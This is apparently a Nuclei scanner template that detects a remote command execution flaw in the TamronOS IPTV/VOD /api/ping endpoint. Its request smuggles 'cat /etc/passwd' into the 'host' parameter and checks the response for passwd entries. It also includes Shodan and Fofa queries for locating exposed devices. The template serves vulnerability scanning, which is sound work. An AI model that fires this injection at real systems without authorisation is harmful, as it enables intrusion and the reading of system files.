id: tamronos-rce

info:
  name: TamronOS IPTV/VOD - Remote Command Execution
  author: pikpikcu
  severity: critical
  description: |
    TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint.
  reference:
    - https://twitter.com/sec715/status/1405336456923471874
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-78
  metadata:
    verified: true
    shodan-query: title:"TamronOS IPTV系统"
    fofa-query: title="TamronOS IPTV系统"
  tags: tamronos,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by cs on 2022/05/13
